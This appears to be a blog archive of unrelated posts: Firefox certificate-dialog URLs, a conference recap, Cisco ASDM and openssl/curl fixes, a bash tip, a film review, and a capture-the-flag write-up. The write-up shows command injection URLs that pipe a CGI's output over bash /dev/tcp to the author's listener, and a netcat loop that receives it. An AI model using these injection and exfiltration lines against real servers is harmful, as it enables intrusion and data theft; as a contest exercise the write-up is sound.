These are the firefox URLs for different settings. Just paste them into the browser and bang, there you go:

chrome://pippki/content/getpassword.xul
chrome://pippki/content/PrefOverlay.xul
chrome://pippki/content/pref-ssl.xul
chrome://pippki/content/pref-certs.xul
chrome://pippki/content/pref-ciphers.xul
chrome://pippki/content/cipherinfo.xul
chrome://pippki/content/ssl2ciphers.xul
chrome://pippki/content/ssl3tlsciphers.xul
chrome://pippki/content/ssl3tlsciphers2.xul
chrome://pippki/content/PageInfoOverlay.xul
chrome://pippki/content/cacertexists.xul
chrome://pippki/content/CAOverlay.xul
chrome://pippki/content/WebSitesOverlay.xul
chrome://pippki/content/OthersOverlay.xul
chrome://pippki/content/MineOverlay.xul
chrome://pippki/content/viewCertDetails.xul
chrome://pippki/content/certpicker.xul
chrome://pippki/content/certDump.xul
chrome://pippki/content/load_device.xul
chrome://pippki/content/pref-validation.xul
chrome://pippki/content/pref-masterpass.xul
chrome://pippki/content/createCertInfo.xul
chrome://pippki/content/formsigning.xul
chrome://pippki/content/changepassword.xul
chrome://pippki/content/resetpassword.xul
chrome://pippki/content/newserver.xul
chrome://pippki/content/downloadcert.xul
chrome://pippki/content/certManager.xul
chrome://pippki/content/editcacert.xul
chrome://pippki/content/editemailcert.xul
chrome://pippki/content/editsslcert.xul
chrome://pippki/content/deletecert.xul
chrome://pippki/content/getp12password.xul
chrome://pippki/content/setp12password.xul
chrome://pippki/content/domainMismatch.xul
chrome://pippki/content/serverCertExpired.xul
chrome://pippki/content/clientauthask.xul
chrome://pippki/content/certViewer.xul
chrome://pippki/content/device_manager.xul
chrome://pippki/content/choosetoken.xul
chrome://pippki/content/escrowWarn.xul
chrome://pippki/content/crlManager.xul
chrome://pippki/content/serverCrlNextupdate.xul
chrome://pippki/content/crlImportDialog.xul
chrome://pippki/content/pref-crlupdate.xul
chrome://pippki/content/getpassword.xul
chrome://pippki/content/PrefOverlay.xul
chrome://pippki/content/pref-ssl.xul
chrome://pippki/content/pref-certs.xul
chrome://pippki/content/pref-ciphers.xul
chrome://pippki/content/cipherinfo.xul
chrome://pippki/content/ssl2ciphers.xul
chrome://pippki/content/ssl3tlsciphers.xul
chrome://pippki/content/ssl3tlsciphers2.xul
chrome://pippki/content/PageInfoOverlay.xul
chrome://pippki/content/cacertexists.xul
chrome://pippki/content/CAOverlay.xul
chrome://pippki/content/WebSitesOverlay.xul
chrome://pippki/content/OthersOverlay.xul
chrome://pippki/content/MineOverlay.xul
chrome://pippki/content/viewCertDetails.xul
chrome://pippki/content/certpicker.xul
chrome://pippki/content/certDump.xul
chrome://pippki/content/load_device.xul
chrome://pippki/content/pref-validation.xul
chrome://pippki/content/pref-masterpass.xul
chrome://pippki/content/createCertInfo.xul
chrome://pippki/content/formsigning.xul
chrome://pippki/content/changepassword.xul
chrome://pippki/content/resetpassword.xul
chrome://pippki/content/newserver.xul
chrome://pippki/content/downloadcert.xul
chrome://pippki/content/certManager.xul
chrome://pippki/content/editcacert.xul
chrome://pippki/content/editemailcert.xul
chrome://pippki/content/editsslcert.xul
chrome://pippki/content/deletecert.xul
chrome://pippki/content/getp12password.xul
chrome://pippki/content/setp12password.xul
chrome://pippki/content/domainMismatch.xul
chrome://pippki/content/serverCertExpired.xul
chrome://pippki/content/clientauthask.xul
chrome://pippki/content/certViewer.xul
chrome://pippki/content/device_manager.xul
chrome://pippki/content/choosetoken.xul
chrome://pippki/content/escrowWarn.xul
chrome://pippki/content/crlManager.xul
chrome://pippki/content/serverCrlNextupdate.xul
chrome://pippki/content/crlImportDialog.xul
chrome://pippki/content/pref-crlupdate.xul 

I recently came back from the ToorConX in San Diego, CA. It was a great conference with some really cool talks. Especially RFD (Remote file download using blind sql injection), reversing malware using browser hooking, cracking crypt() hashes using Ps3, grey box peach fuzz xml generation tool (nunchaku), voip eavesdropping, bypassing browser memory protection.
These were some really cool talks but I still don’t have access to any presentation slides yet for the con. May be those will be posted some time.

Cisco ASDM is quirky in the sense that if the right Java version is not found it will just puke with errors that make no sense. This is what my java log looks like:
Application Logging Started at Fri Aug 01 11:01:11 EDT 2010
---------------------------------------------
Local Launcher Version = 1.5.41
Local Launcher Version Display = 1.5(41)
Cannot read profile file C:\Documents and Settings\abcdef\.asdm\data\deviceinfo.conf.
OK button clicked
Trying for ASDM Version file; url = https://www.example.com/admin/
Server Version = 6.2(1)
Server Launcher Version = 1.5.41, size = 476672 bytes
Launcher version checking is successful.
invoking SGZ Loader..
Cache location = C:/Documents and Settings/abcdef/.asdm/cache
Exception in thread "SGZ Loader: launchSgzApplet" java.lang.NoSuchFieldError: b
at dac.setLevel(dac.java:65)
at dac.(dac.java:44)
at gd.(gd.java:78)
at f5.a(f5.java:117)
at com.cisco.dmcommon.util.DMCommonEnv.(DMCommonEnv.java:38)
at com.cisco.pdm.PDMApplet.updateProgress(PDMApplet.java:300)
at com.cisco.pdm.PDMApplet.init(PDMApplet.java:63)
at com.cisco.nm.dice.loader.r.run(DashoA19*..:409)
It happens because the ASDM launcher is not capable of running on newer JVMs. Since I had older JVMs, I went into Control Panel -> Java. Click on the Java tab, followed by clicking the “view” button. This will show you the current JVM being used. If you have older JVMs click on Find (you will have to select the folder where you suspect older JVMs to be…which in my case was c:\Program Files). If you don’t find an older JVM then just install an older version and it will work.

The problem: Using Digital Certificates issued by a Certification Authority (CA) with curl.

The situation: I have a .cer (Digital Certificate) file, .pfx (Personal Information Exchange file i.e., the private key for the certificate). I cannot use either of these to authenticate to the web service as curl would not accept these formats.

The solution:
1) Convert it into PEM format (X.509 certificate) using openssl.
openssl pkcs12 -in abcd.pfx -out abcd.pem
Enter a passphrase and a password.
2) Still you cannot use this with curl because you’d get a few errors.
3) Convert this PEM certificate into three different certificates for the client, the private key and the certification authority certificate.
openssl pkcs12 -in abcd.pfx -out ca.pem -cacerts -nokeys
openssl pkcs12 -in abcd.pfx -out client.pem -clcerts -nokeys
openssl pkcs12 -in abcd.pfx -out key.pem -nocerts
4) Use the following command:
curl -k https://www.thesitetoauthenticate.com/test -v –key key.pem –cacert ca.pem –cert client.pem:

This stuff is also mentioned on curl forum at http://curl.haxx.se/mail/archive-2005-09/0138.html

The Plaid Parliament of Pwning organized their own Capture-the-Flag (CtF) contest this past weekend. It was an excellent CtF with about 36 challenges ranging from trivia, exploitation, reverse engineering, web exploitation, cryptography, and forensics.

My writeup for #16 – Plain sight [200 pts] web
The problem was

The time to strike is now! This fiendish AED employee decided to hide secret data on this website (http://a4.amalgamated.biz/cgi-bin/chroot.cgi)
It seems that the employee was in the middle of creating the website when our operatives stumbled upon it.
The good news is that there are surely bugs in the development version of this problem, the bad news is currently no feedback printed to users.
Some of our leet operatives have determined a little bit about the machine: it runs in a read-only environment with only
bash cat dc expand grep hd head id less ls more nl od pr rev sh sleep sort sum tail tar tr true tsort ul wc yes
installed.

Find what AED is hiding, good luck and godspeed.

There was a URL http://a4.amalgamated.biz/cgi-bin/chroot.cgi that allowed remote code execution.
bash, cat, less, more, ls were allowed.

First thing I did was checked if the bash TCP connections were allowed using:
http://a4.amalgamated.biz/cgi-bin/chroot.cgi?ls>/dev/tcp/MYIP/5000

That seemed to work. So then I listed the directories one by one until I bumped onto:
I used http://a4.amalgamated.biz/cgi-bin/chroot.cgi?cat%20keyfolder/key>/dev/tcp/MYIP/5000 I had the port forwarded to my PC and a netcat listener running in a loop
while [ 1 ]
do
nc -l -v -p 5000
done

The answer was esc4p3_str1ng5.

Fun times!

I wanted to use variables in a bash script’s for loop inside awk’s print statement.
Here’s an easy way to do it – enclose the bash variable within "’"

Here’s a sample scripts to take a list of IPs and do a DNS lookup and generate a CSV:

for ip in `cat ips.txt`
do
  host $ip|grep -v NXDOMAIN|sed 's/\.$//g'|awk '{print "'"$ip"'"","$NF}'
done

Silsilay, the latest movie by Khalid Mohammed, a critic famous for his Sunday Times articles, is a disaster to say the least. Mr.Mohammed, who has torn apart most of the movies in his journalism career, to my disappointment, has not proven himself any better than the pack he tore apart. I think if he himself saw the movie impartially he probably would have given it negative five stars.
Silsilay, as the movie is called, is a movie of three stories running one after the other albeit aimlessly. The first story is of a film actress (Bhoomika Chawla) who falls in love with a bookie (Rahul Bose) who is two-timing his girl-friend, who in turn is two-timing him…sounds complex…don’t bother…it’s not complex but just kiwi drainex!
The second story is of a young girl (Riya Sen) who looks stunning in the movie and is afraid to lose her virginity and is consoled by her overly promiscuous friend to do *it*. Ashmit Patel steps into the story as her boy toy (read “snuggies”) and Jimmy Shergill, who is her co-worker from work and is looking to gain her attention. Some good (aimless) smooches result between Ashmit and Riya and Khalid Mohammed succeeds in spinning a story that is as ridiculous as Riya and Ashmit’s acting. For god’s sake Riya, Nirma soap advertisements were better!
As if the torture was not enough, Mr.Mohammed had a life-saver (or at least as he thought) a still more ridiculous story. Well, some B-grade films would have called this 3rd story a *saga*…but I frankly think that Khalid Mohammed doesn’t think!
It’s a combination of a love triangle…sorry…love quadrilateral with a diagonal (please figure out what this means on your own…watching the movie wouldn’t help anyway). In this story Tabu plays a housewife whose husband (KK) is going out with a (super hot) air hostess (Celina Jaitley) and whose son suffers from Oedipus Complex ( where a person falls in love with his own mother). As if this carcass did not stink the theatres…there was more bull**** coming across in the form of Shah Rukh Khan in between stories and scenes. Mr. Khan there are many ways to win Filmfare awards…this is probably the last way to *buy* the awards. Mr.Khan does a saving act by signalling to the audience how he behaves when nature calls arrive…how he insanely goes about dancing for no reason whatsoever.
This is all a part of the crap that I call Silsilay!
-Rajat.
Awesome Japanese Artifacts!